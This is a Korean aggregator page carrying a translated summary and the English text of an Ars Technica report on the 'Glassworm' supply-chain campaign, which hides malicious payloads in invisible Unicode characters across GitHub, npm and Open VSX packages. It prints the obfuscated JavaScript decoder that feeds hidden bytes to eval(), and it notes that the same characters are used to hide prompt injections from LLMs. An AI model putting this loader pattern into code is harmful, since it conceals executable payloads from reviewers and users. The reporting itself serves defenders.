Ars Technica • 78일 전

보이지 않는 코드를 활용한 공급망 공격으로 깃허브 타격

IMP

8/10

핵심 요약

최근 공급망 공격자들이 육안으로 보이지 않는 유니코드 특수문자를 이용해 악성 패키지를 깃허브 등 주요 저장소에 대량으로 배포하는 위협이 감지되었습니다. AI를 활용해 정상적인 코드 커밋처럼 위장한 이 패키지들은 기존의 정적 분석 도구나 수동 코드 리뷰를 무력화시켜 매우 심각한 보안 위협을 초래합니다.

번역된 본문

연구원들에 따르면, 보이지 않는 코드(invisible code)를 포함한 악성 패키지로 저장소를 공격하는 공급망 공격(supply-chain attack)이 발견되었으며, 이 기법은 기존의 위협 탐지용 방어 시스템들을 혼란에 빠뜨리고 있습니다.

Aikido Security의 연구원들은 금요일에 3월 3일부터 3월 9일까지 깃허브(GitHub)에 업로드된 151개의 악성 패키지를 발견했다고 밝혔습니다. 이러한 공급망 공격은 거의 10년 동안 흔하게 발생해 왔습니다. 일반적으로 널리 사용되는 코드 라이브러리와 코드 및 이름이 매우 유사한 악성 패키지를 업로드하여, 개발자가 이를 실수로 소프트웨어에 포함시키도록 속이는 방식으로 작동합니다. 경우에 따라 이러한 악성 패키지는 수천 번씩 다운로드되기도 합니다.

방어 시스템은 아무것도 보지 못합니다. 디코더는 실행 가능한 코드를 봅니다.

Aikido가 이번 달에 발견한 패키지들은 비교적 최신 기법을 채택했습니다. 거의 모든 편집기, 터미널 및 코드 리뷰 인터페이스에 로드될 때 보이지 않는 코드를 선택적으로 사용하는 것입니다. 대부분의 코드는 일반적이고 읽기 쉬운 형태로 보이지만, 악의적인 목적을 가진 함수와 페이로드(악성코드의 핵심 부분)는 사람의 눈에 보이지 않는 유니코드(Unicode) 문자로 렌더링됩니다. 작년에 Aikido가 처음으로 포착한 이 전술은 수동 코드 리뷰 및 기타 전통적인 방어 방식을 거의 무용지물로 만듭니다. 이번 공격의 표적이 된 다른 저장소로는 NPM과 Open VSX가 있습니다.

보이는 부분의 퀄리티가 매우 높기 때문에 이러한 악성 패키지는 탐지하기가 훨씬 더 어렵습니다. Aikido 연구원들은 "악성 코드 주입은 명백히 의심스러운 커밋으로 들어오지 않는다"라고 설명했습니다. "주변 변경 사항이 매우 그럴듯합니다. 문서 수정, 버전 업데이트, 작은 리팩토링 및 버그 수정 등이 각 대상 프로젝트의 스타일과 일치하게 구성됩니다."

연구원들은 이 공격 그룹에 '글래스웜(Glassworm)'이라는 이름을 붙였으며, 이 그룹이 대규모 언어 모델(LLM)을 사용하여 이처럼 그럴듯하고 적법해 보이는 패키지를 생성하고 있다고 의심하고 있습니다. 연구원들은 "우리가 지금 목격하는 규모를 고려할 때, 서로 다른 코드베이스에 걸쳐 151개 이상의 맞춤형 코드 변경 사항을 수동으로 만드는 것은 단순히 불가능합니다"라고 덧붙였습니다. 같은 그룹을 추적해 온 또 다른 보안 업체 Koi 역시 이 그룹이 AI를 사용하고 있을 것으로 의심하고 있다고 밝혔습니다.

이 보이지 않는 코드는 '사용자 영역(Private Use Areas, 때때로 Private Use Access라고도 함)'을 사용하여 렌더링됩니다. 이는 이모지, 국기 및 기타 기호를 정의하기 위해 개인적인 용도로 예약된 유니코드 사양의 특수 문자 범위입니다. 이 코드 포인트는 컴퓨터로 전달될 때 미국 알파벳의 모든 글자를 나타내지만, 그 출력 결과는 사람의 눈에는 완전히 보이지 않습니다. 코드를 검토하거나 정적 분석 도구를 사용하는 사람들은 공백이나 빈 줄만 보게 됩니다. 하지만 자바스크립트(JavaScript) 인터프리터에게 이 코드 포인트는 실행 가능한 코드로 변환됩니다.

이 보이지 않는 유니코드 문자는 수십 년 전에 고안되었으나 이후 거의 잊혀졌습니다. 그러다 2024년, 해커들이 AI 엔진에 제공되는 악의적인 프롬프트를 숨기기 위해 이 문자를 사용하기 시작하면서 다시 주목받게 되었습니다. 텍스트가 사람이나 텍스트 스캐너에는 보이지 않았음에도 불구하고, LLM은 이를 읽고 전달된 악성 명령을 따르는 데 아무런 어려움이 없었습니다. AI 엔진은 이후 이러한 문자의 사용을 제한하기 위한 가드레일(안전장치)을 고안했지만, 이러한 방어 수단도 주기적으로 우회되고 있습니다.

그 이후로 이 유니코드 기술은 보다 전통적인 악성코드 공격에 사용되어 왔습니다. Aikido가 금요일 게시물에서 분석한 패키지 중 하나에서 공격자들은 보이지 않는 문자를 사용하여 악성 페이로드를 인코딩했습니다. 코드를 검사해도 아무것도 보이지 않습니다. 그러나 자바스크립트 런타임 중에 작은 디코더가 실제 바이트를 추출하여 eval() 함수에 전달합니다.

const s = v => [...v].map( w => ( w = w.codePointAt( 0 ), w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 : w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null )).filter( n => n !== null ); eval (Buffer.from(s( `` )).toString( 'utf-8' ));

연구원들은 "s()에 전달된 백틱 문자열은 모든 뷰어에서 비어 있는 것처럼 보인다"라고 설명했습니다.

원문 보기

원문 보기 (영어)

Text settings Story text Size Small Standard Large Width * Standard Wide Links Standard Orange * Subscribers only Learn more Minimize to nav Researchers say they’ve discovered a supply-chain attack flooding repositories with malicious packages that contain invisible code, a technique that’s flummoxing traditional defenses designed to detect such threats. The researchers, from firm Aikido Security, said Friday that they found 151 malicious packages that were uploaded to GitHub from March 3 to March 9. Such supply-chain attacks have been common for nearly a decade . They usually work by uploading malicious packages with code and names that closely resemble those of widely used code libraries, with the objective of tricking developers into mistakenly incorporating the former into their software. In some cases, these malicious packages are downloaded thousands of times. Defenses see nothing. Decoders see executable code The packages Aikido found this month have adopted a newer technique: selective use of code that isn’t visible when loaded into virtually all editors, terminals, and code review interfaces. While most of the code appears in normal, readable form, malicious functions and payloads—the usual telltale signs of malice—are rendered in unicode characters that are invisible to the human eye. The tactic, which Aikido said it first spotted last year, makes manual code reviews and other traditional defenses nearly useless. Other repositories hit in these attacks include NPM and Open VSX. The malicious packages are even harder to detect because of the high quality of their visible portions. “The malicious injections don’t arrive in obviously suspicious commits,” Aikido researchers wrote. “The surrounding changes are realistic: documentation tweaks, version bumps, small refactors, and bug fixes that are stylistically consistent with each target project.” The researchers suspect that Glassworm—the name they assigned to the attack group—is using LLMs to generate these convincingly legitimate-appearing packages. “At the scale we’re now seeing, manual crafting of 151+ bespoke code changes across different codebases simply isn’t feasible,” they explained. Fellow security firm Koi, which has also been tracking the same group, said it, too, suspects the group is using AI. The invisible code is rendered with Private Use Areas (sometimes called Private Use Access), which are ranges in the Unicode specification for special characters reserved for private use in defining emojis, flags, and other symbols. The code points represent every letter of the US alphabet when fed to computers, but their output is completely invisible to humans. People reviewing code or using static analysis tools see only whitespace or blank lines. To a JavaScript interpreter, the code points translate into executable code. The invisible Unicode characters were devised decades ago and then largely forgotten. That is, until 2024, when hackers began using the characters to conceal malicious prompts fed to AI engines . While the text was invisible to humans and text scanners, LLMs had little trouble reading them and following the malicious instructions they conveyed. AI engines have since devised guardrails that are designed to restrict usage of the characters, but such defenses are periodically overridden . Since then, the Unicode technique has been used in more traditional malware attacks. In one of the packages Aikido analyzed in Friday’s post, the attackers encoded a malicious payload using the invisible characters. Inspection of the code shows nothing. During the JavaScript runtime, however, a small decoder extracts the real bytes and passes them to the eval() function. const s = v => [...v].map( w => ( w = w.codePointAt( 0 ), w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 : w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null )).filter( n => n !== null ); eval (Buffer.from(s( `` )).toString( 'utf-8' )); “The backtick string passed to s() looks empty in every viewer, but it’s packed with invisible characters that, once decoded, produce a full malicious payload,” Aikido explained. “In past incidents, that decoded payload fetched and executed a second-stage script using Solana as a delivery channel, capable of stealing tokens, credentials, and secrets.” Since finding the new round of packages on GitHub, the researchers have found similar ones on npm and the VS Code marketplace. Aikido said the 151 packages detected are likely a small fraction spread across the campaign because many have been deleted since first being uploaded. The best way to protect against the scourge of supply-chain attacks is to carefully inspect packages and their dependencies before incorporating them into projects. This includes scrutinizing package names and searching for typos. If suspicions about LLM use are correct, malicious packages may increasingly appear to be legitimate, particularly when invisible unicode characters are encoding malicious payloads. Dan Goodin Senior Security Editor Dan Goodin Senior Security Editor Dan Goodin is Senior Security Editor at Ars Technica, where he oversees coverage of malware, computer espionage, botnets, hardware hacking, encryption, and passwords. In his spare time, he enjoys gardening, cooking, and following the independent music scene. Dan is based in San Francisco. Follow him at here on Mastodon and here on Bluesky. Contact him on Signal at DanArs.82. 78 Comments

보안 공급망 공격 깃허브 유니코드 AI 코딩

클로드 코드(Claude Code) 소스 코드 유출이 시사하는 점

클로드 코드의 소스 코드가 유출되어 코드 품질이 낮다는 비판과 함께 큰 화제가 되었습니다. 하지만 이 사건은 코드의 품질보다 제품-시장 적합성(PMF)과 자가 복구 시스템 같은 관측 가능성(observability)이 소프트웨어의 성공에 훨씬 더 중요하다는 것을 보여줍니다. 코드 자체의 중요성이 줄어들고 있는 현재 소프트웨어 개발 패러다임의 변화를 시사하는 사건입니다.

클로드 코드 소스코드 유출 제품-시장 적합성

TechCrunch AI • 59일 전

IMP 5

앤스로픽 소스코드 삭제 요구 철회…"단순 실수"

앤스로픽(Anthropic)이 최근 유출된 자사 소스코드를 대상으로 일괄 삭제 조치를 시도했으나, 이내 대부분의 게시 중단(삭제) 요청을 철회했습니다. 회사 측은 이번 사태가 의도된 것이 아닌 단순 실수(사고)였다고 해명했습니다.